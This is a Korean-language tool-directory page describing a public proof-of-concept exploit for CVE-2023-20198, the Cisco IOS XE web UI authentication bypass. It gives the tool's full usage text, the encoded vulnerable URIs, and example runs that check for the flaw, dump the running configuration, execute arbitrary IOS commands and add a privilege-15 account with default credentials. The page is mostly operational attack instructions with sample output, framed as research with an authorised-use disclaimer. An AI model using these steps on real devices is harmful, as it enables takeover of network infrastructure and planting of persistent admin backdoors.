Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-20198 — CVE-2023-20198 Exploit PoC | Kitploit
도구/GitHubGitHub/smokeintheshell/cve-2023-20198
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlAuthentication
GitHubsmokeintheshell/cve-2023-20198

CVE-2023-20198

CVE-2023-20198 Exploit PoC

저장소 보기
66194개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-20198

CVE-2023-20198용 Exploit PoC

설명

CVE-2023-20198은 잘못된 경로 검증으로 인해 Nginx 필터링을 우회하여 인증 없이 webui_wsma_http 웹 엔드포인트에 도달할 수 있는 취약점입니다.
엔드포인트에 대한 인증을 우회하면 공격자는 임의의 Cisco IOS 명령을 실행하거나 Privilege 15 권한으로 구성 변경을 수행할 수 있습니다.
이전에 비공개된 이 취약점의 활발한 악용에 대한 Cisco의 조사 결과, 위협 행위자들이 먼저 CVE-2023-20198을 악용하여 Privilege level 15를 가진 새 사용자를 추가한 것으로 확인되었습니다. 이후 공격에서는 CVE-2023-20273을 악용하여 기본 Linux OS의 root 사용자로 권한을 상승시켜 임플란트 설치를 용이하게 했습니다.

이 PoC는 CVE-2023-20198을 악용하여 두 개의 서로 다른 XML SOAP 엔드포인트를 활용합니다:
취약점 확인, 구성, 명령 실행 옵션은 모두 cisco:wsma-exec SOAP 엔드포인트를 대상으로 하여 execCLI 요소 태그에 명령을 삽입합니다.
사용자 추가 옵션은 cisco:wsma-config SOAP 엔드포인트를 대상으로 하여 구성 변경을 실행하고 Privilege 15 계정을 추가합니다. 이 엔드포인트는 다른 구성 변경에 [오]용될 수 있지만, 이는 이 PoC의 범위를 벗어납니다.

cisco:wsma-exec SOAP 엔드포인트의 악용은 nuclei 템플릿에서 비롯되었습니다.
cisco:wsma-config SOAP 엔드포인트의 악용은 horizon3ai PoC에서 비롯되었습니다.

참고: 저는 이 CVE에 대한 원본 연구나 PoC 개발을 수행하지 않았습니다. 크레딧은 참고 자료 섹션을 참조하세요.

사용법

root@kitploit:~
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help          show this help message and exit
  -t targetIP         Target IP Address
  -l targetFile       File containing IP Addresses (-c only)
  -https              Use https
  -uri vulnerableURI  The URI that is vulnerable to exploit. The most common are "%2577eb%2575i_%2577sma_Http", "%2577eb%2575i_%2577sma_https", and "%2577ebui_wsma_https". You may need to play around with these along with -https to get a true positive result
  -c                  [X] Check for vulnerability
  -g                  [X] Get Cisco IOS running config
  -e command          [X] Execute Cisco IOS command
  -a                  [X] Add new priv 15 user
  -d                  [X] Remove priv 15 user
  -u newUserName      [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass      [Optional] new user pass for -a. Default: pwned
  -o outputFile       Write output to file
  -v                  Increase verbosity

취약점 확인

CVE-2023-20198을 확인하려면 -c 옵션이 취약점을 악용하여 uname -a를 실행합니다.
예시:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)

Cisco 구성 가져오기

-g 옵션은 sh run을 실행하여 실행 중인 구성을 가져옵니다.
예시:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...

명령 실행

-e 옵션으로 임의의 Cisco IOS 명령을 실행할 수 있습니다.
구성 변경에 이 기능을 사용할 때는 극도로 주의해야 합니다. 입력 검증이 없으며 변경 사항은 실행 중인 구성에 즉시 적용됩니다.
예시:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...

사용자 추가

-a 옵션은 새 Privilege 15 사용자 계정을 생성하는 데 사용할 수 있으며, 선택적으로 -u와 -p로 계정 이름과 암호를 각각 지정할 수 있습니다.
예시:

root@kitploit:~
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.

사용자 삭제

-d 옵션은 장치에서 사용자 계정을 제거하는 데 사용할 수 있으며, -u로 지정된 사용자 이름을 사용합니다.
정상적인 계정을 삭제하지 않도록 주의해야 합니다.
이 옵션은 악용된 Cisco에 대한 셸/웹 UI 접근을 얻을 수 없는 경우를 위해 추가되었습니다. Privilege 15 사용자를 추가해도 웹 UI 접근이 허용되지 않으며, 호스트에 악용 흔적을 남길 수 있다는 것이 관찰되었습니다.

참고 자료

Cisco 권고
horizon3ai CVE-2023-20198 연구
horizon3ai CVE-2023-20198 PoC
nuclei CVE-2023-20198 템플릿 (작성자: iamnoooob, rootxharsh, pdresearch)
LeakIX CVE-2023-20273 PoC

할 일

  • https 지원
  • CVE-2023-20273 구현
  • 타임아웃 및 오류 처리

면책 조항

이 프로젝트에 포함된 코드는 연구 목적과 사용자가 명시적 승인을 받은 시스템에서의 사용만을 위한 것입니다.
이 프로젝트의 저자는 소프트웨어의 오용에 대해 책임을 지지 않습니다.
책임감 있게 사용하고 악의적으로 행동하지 마세요.

도구 다운로드